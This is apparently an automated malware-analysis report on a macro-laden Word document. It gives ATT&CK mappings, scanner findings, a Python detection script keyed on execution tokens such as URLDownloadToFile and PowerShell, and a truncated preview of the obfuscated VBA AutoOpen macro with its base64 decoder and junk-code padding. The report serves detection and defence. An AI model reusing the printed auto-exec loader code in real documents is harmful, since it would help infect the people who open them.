Verdict: MALICIOUS (risk score 282)

Malware Insights

MITRE ATT&CK
- T1059.005 Command and Scripting Interpreter: Visual Basic
- T1059 Command and Scripting Interpreter
- T1204.002 User Execution: Malicious File
- T1566.001 Phishing: Spearphishing Attachment
The sample is a malicious OLE (binary Word) document carrying a VBA project whose AutoOpen subroutine runs as soon as the document is opened. The recovered source uses randomized identifier names, junk arithmetic and dead `If ... Len(Application.UserName)` branches as padding; the one operative line in AutoOpen decodes an embedded base64 blob with a hand-rolled table decoder, transforms the result with a second key-driven routine, and hands the output to a procedure in another module that is not within the preview. Together with the `Shell()` and `CreateObject()` rule hits, this is consistent with a downloader that fetches and executes a second-stage payload. ClamAV independently flags the file as an obfuscated macro document.
Heuristics (8)

| Finding | Severity | Rule | Description |
|---|---|---|---|
| ClamAV: Doc.Macro.Obfuscated-6397052-2 | critical | CLAMAV_DETECTION | ClamAV detected this file as malware: Doc.Macro.Obfuscated-6397052-2 |
| VBA macros detected | medium | OLE_VBA_MACROS | Document contains VBA macro code (4 related findings) |
| Shell() call in VBA | critical | OLE_VBA_SHELL | Shell() call in VBA |
| AutoOpen macro | high | OLE_VBA_AUTOOPEN | AutoOpen macro |
| CreateObject call | high | OLE_VBA_CREATEOBJ | CreateObject call |
| VBA p-code auto-exec with execution tokens | high | OLE_VBA_PCODE_AUTOEXEC_EXEC | Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable. |
| Legacy WordBasic auto-exec macro marker | medium | OLE_LEGACY_WORDBASIC_AUTOEXEC | OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself. |
| Embedded URL | info | EMBEDDED_URL | One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. |

URLs found in document text (OLE body):
- http://www.w3.org/1999/02/22-rdf-syntax-ns#
- http://ns.adobe.com/xap/1.0/
- http://ns.adobe.com/xap/1.0/mm/
- http://ns.adobe.com/xap/1.0/sType/ResourceEvent#
- http://ns.adobe.com/photoshop/1.0/
- http://purl.org/dc/elements/1.1/
- http://ns.adobe.com/tiff/1.0/
- http://ns.adobe.com/exif/1.0/
- http://schemas.openxmlformats.org/drawingml/2006/main

All nine are XML namespace identifiers (RDF, Adobe XMP, Dublin Core, TIFF/EXIF, DrawingML) of the kind carried in embedded image metadata and drawing XML; none of them is a download or command-and-control endpoint. The download URL, if any, is inside the obfuscated macro string and does not appear in this list.
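The OLE_VBA_PCODE_AUTOEXEC_EXEC rule above fires on the combination of an auto-execution name and an execution-class name inside a raw VBA/cache stream, independent of whether readable source was recovered. As an added example (not the analyzer's own code), the script below implements that shape of check over raw stream bytes, matching each token both as ASCII and as UTF-16LE so that wide-string copies are not missed. The token lists and the two sample streams are constructed for illustration and are not carved from this sample.

```python
import re

# Token classes the check keys on. Lists are illustrative; the analyzer's
# own lists are not published on this page.
AUTOEXEC_TOKENS = ("AutoOpen", "AutoExec", "AutoClose", "Document_Open", "Workbook_Open")
EXEC_TOKENS = ("Shell", "CreateObject", "WScript.Shell", "URLDownloadToFile",
               "XMLHTTP", "ADODB.Stream", "PowerShell")


def _pattern(token):
    """Match the token as ASCII or as UTF-16LE (how wide strings are stored),
    case-insensitively, so a scan over raw stream bytes sees both spellings."""
    ascii_form = re.escape(token.encode("ascii"))
    wide_form = re.escape(token.encode("utf-16-le"))
    return re.compile(b"(?:" + ascii_form + b"|" + wide_form + b")", re.IGNORECASE)


PATTERNS = {tok: _pattern(tok) for tok in AUTOEXEC_TOKENS + EXEC_TOKENS}


def scan_stream(data):
    """Return the auto-exec and execution tokens found in a raw byte stream."""
    hits = {"autoexec": [], "exec": []}
    for tok in AUTOEXEC_TOKENS:
        if PATTERNS[tok].search(data):
            hits["autoexec"].append(tok)
    for tok in EXEC_TOKENS:
        if PATTERNS[tok].search(data):
            hits["exec"].append(tok)
    return hits


def pcode_autoexec_exec(data):
    """True only when both classes are present: the combination the rule fires on."""
    hits = scan_stream(data)
    return bool(hits["autoexec"]) and bool(hits["exec"])


# Constructed sample streams (not from the sample). The first mimics a cache
# region where source text is gone but identifier names survive, one of them
# stored wide; the second carries an auto-exec name but no execution token.
SUSPICIOUS = (b"\x00\x02\x10\x00" + b"VEBehUuLXWKntkDDq" + b"\x00" * 4
              + b"autoopen" + b"\x00\x00" + "CreateObject".encode("utf-16-le")
              + b"\x01\x7f" + b"Shell")
BENIGN = b"\x00\x02" + b"AutoOpen" + b"\x00" + b"ActiveDocument.Range.Text"

if __name__ == "__main__":
    for name, blob in (("suspicious", SUSPICIOUS), ("benign", BENIGN)):
        print(name, pcode_autoexec_exec(blob), scan_stream(blob))
```

Scanning raw bytes this way assumes identifier names are stored in the clear. Module source in an OLE file is MS-OVBA compressed, so for the source-present case decompress first (olevba does this); the rule's value is the opposite case, where compressed source is absent or damaged but the p-code and cache regions still carry the names.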
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 70267 bytes | 59637168d9f20eda691d59984ce0d8db5533021be9b8376e3af433e48db900a9 |
Script preview (first 1,000 lines of the extracted script; the preview breaks off mid-identifier where shown). The two `Attribute VB_Name` lines mark two concatenated modules: the `ThisDocument` class module, which contributes attributes only, and a standard module with a randomized name that holds AutoOpen and the decoder. Lines beginning with `' [analyst note]` are annotations added here, not part of the extracted source.

```vb
' [analyst note] Module 1: ThisDocument, attributes only
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' [analyst note] Module 2: randomized-name standard module; holds the AutoOpen entry point
Attribute VB_Name = "VEBehUuLXWKntkDDq"
Sub AutoOpen()
Dim qSIUZXegBMPCn As String
Dim deQeuRZIfmZ As Integer
deQeuRZIfmZ = 1 * 6
' [analyst note] The only operative statement: base64 blob -> jPIFMdtKUVhgqpVv (table decoder) -> AhDDbigKwsSrbL with the key string
qSIUZXegBMPCn = AhDDbigKwsSrbL(jPIFMdtKUVhgqpVv("IDc1O2ltbFM1Ozo7LCZXIidaKjkpLWYkLCR6KDs1JlwjVDosVTk8HCkhXlohMD4sKVReKnclLDg="), "HCAKSBC2PIUVCB2PI3GILUHGCIUGUYO2F3UC2UY3FO23OUYCF32OYUDHOYGU32FVYUO23GF")
Dim fFvjIasmoupbewNMoXL As Integer
fFvjIasmoupbewNMoXL = 9 * 3
' [analyst note] Decoded string handed to a procedure in a module outside this preview
HdMeSqnbfuPuCuGG.OPYHNQONAMvO (qSIUZXegBMPCn)
' [analyst note] Everything below in AutoOpen is padding: Collection literals, junk arithmetic and
' [analyst note] Len(Application.UserName) comparisons whose results are never read again in the visible code
Dim SNPWuqhZXaQXcwrVg As Integer
SNPWuqhZXaQXcwrVg = 2
Dim OoBcyZPqAIMbzSMho As Integer
OoBcyZPqAIMbzSMho = 7
Dim TqlGTSmBbfCJkIEfTEI As Integer
TqlGTSmBbfCJkIEfTEI = 7
Dim tOKSlqLFOcgFpjT As Collection
Set tOKSlqLFOcgFpjT = New Collection
tOKSlqLFOcgFpjT.Add "XqRaEbdfTqvnPY"
tOKSlqLFOcgFpjT.Add "rTaTkkaElFmbk"
If TqlGTSmBbfCJkIEfTEI < Len(Application.UserName) Then
Dim WZiTObqvUnKgbUB As Integer
WZiTObqvUnKgbUB = 3 * 1
Dim xTMpVlvuijBNyDiRVz As Object
Dim fryrrqZxRgnyfFo As Integer
fryrrqZxRgnyfFo = 4 * 9
TqlGTSmBbfCJkIEfTEI = Len(Application.UserName)
End If
If OoBcyZPqAIMbzSMho < Len(Application.UserName) Then
Dim HgHRerWgtwYCyrIama As Object
Dim LrzHeJjfzqH As Integer
LrzHeJjfzqH = 8
Dim rmmuIRJaakZeuErVKkS As Collection
Set rmmuIRJaakZeuErVKkS = New Collection
rmmuIRJaakZeuErVKkS.Add "aClDKoANjvhWN"
rmmuIRJaakZeuErVKkS.Add "fkhSyNraYgJHVKUu"
rmmuIRJaakZeuErVKkS.Add "xSWiXiljIMaf"
rmmuIRJaakZeuErVKkS.Add "vNoBFBlhbDZ"
rmmuIRJaakZeuErVKkS.Add "efiQRChFnCIaTuffTmY"
rmmuIRJaakZeuErVKkS.Add "etKUndKGvSydGHJu"
rmmuIRJaakZeuErVKkS.Add "EupAULfJNoLoaQfMN"
rmmuIRJaakZeuErVKkS.Add "IfeRKRMYMRIZDTOG"
rmmuIRJaakZeuErVKkS.Add "QfWdiWBWOsTvFZCU"
rmmuIRJaakZeuErVKkS.Add "lYIJuMbgEVE"
If LrzHeJjfzqH < Len(Application.UserName) Then
Dim KFMINWOiQBjCBCKvZqC As Integer
KFMINWOiQBjCBCKvZqC = 4 * 4
Dim eSvPTimLMfMBClGfbU As Object
Dim SaCntVupewTzJIcw As Integer
SaCntVupewTzJIcw = 9 * 9
LrzHeJjfzqH = Len(Application.UserName)
End If
OoBcyZPqAIMbzSMho = Len(Application.UserName)
End If
If SNPWuqhZXaQXcwrVg < Len(Application.UserName) Then
Dim iXkBcHznBBOGFA As Integer
iXkBcHznBBOGFA = 3 * 9
Dim LmvPoXVTRjeMovflcv As Object
Dim FwRYOEIbhNPTU As Integer
FwRYOEIbhNPTU = 3 * 9
SNPWuqhZXaQXcwrVg = Len(Application.UserName)
End If
' OPTIONS
Dim qDIvslNHWQdcJKOhtY As Integer
qDIvslNHWQdcJKOhtY = 4 * 4
End Sub
' [analyst note] Table-driven decoder: a static 256-entry byte table filled with 255 (invalid marker)
' [analyst note] and then populated from index 0 To 25 onward is the standard shape of a base64 reverse table
Public Function jPIFMdtKUVhgqpVv(VGZowPzNbINHAV As String, Optional PLSHqwSdvjWEYF As Boolean = True) As String
Static RYXkcACuHNgNS(0 To 255) As Byte
Dim nztASlfVYbuSYEO As Collection
Set nztASlfVYbuSYEO = New Collection
nztASlfVYbuSYEO.Add "LjfwkEqBNcYu"
nztASlfVYbuSYEO.Add "xGXDnuEmblqyPYfJiIm"
Dim FdtgesasZuGs() As Byte, CKYacBGGVINCoCBI() As Byte
Dim tMdhxqdtJvCsAnzuU As Integer
tMdhxqdtJvCsAnzuU = 3 * 1
Dim HtvtVfdqfaYTfqrjk As Long, JEUTxgjwAjlWU As Long
Dim nEafHgpgBFqR As Integer
nEafHgpgBFqR = 6
Dim DIiWHdNTpFIgivSgaS As Integer
DIiWHdNTpFIgivSgaS = 4 * 6
If nEafHgpgBFqR < Len(Application.UserName) Then
Dim LxpsNvXNDNrplIVHHRY As Integer
LxpsNvXNDNrplIVHHRY = 5 * 5
Dim iZeifLxrnbYgFFOFS As Object
Dim jmGBjTIlDec As Integer
jmGBjTIlDec = 8 * 4
nEafHgpgBFqR = Len(Application.UserName)
End If
If RYXkcACuHNgNS(0) = 0 Then
Dim NwirXRsLeaGsZllEB As Integer
NwirXRsLeaGsZllEB = 6 * 9
For HtvtVfdqfaYTfqrjk = 0 To 255
Dim YKXhJSnTBDzEwkt As Integer
YKXhJSnTBDzEwkt = 4 * 7
RYXkcACuHNgNS(HtvtVfdqfaYTfqrjk) = 255
Dim cMmktmOmPnYZLEecope As Integer
cMmktmOmPnYZLEecope = 8 * 4
Next HtvtVfdqfaYTfqrjk
Dim RIbUXzxdaReBqevNA As Integer
RIbUXzxdaReBqevNA = 3 * 6
For HtvtVfdqfaYTfqrjk = 0 To 25
Dim BhVDYUdinQMJRwDap As Collection
Set BhVDYUdinQMJRwDap = New Collection
BhVDYUdinQMJRwDap.Add "uZjJDKQxSTsJ"
BhVDYUdinQMJRwDap.Add "eHLURCUcgEPhwgJ"
BhVDYUdinQMJRwDap.Add "iWKewzvfQzQcO"
BhVDYUdinQMJRwDap.Add "zTYiyvicqhLmCMTpyb"
BhVDYUdi
```
... (truncated)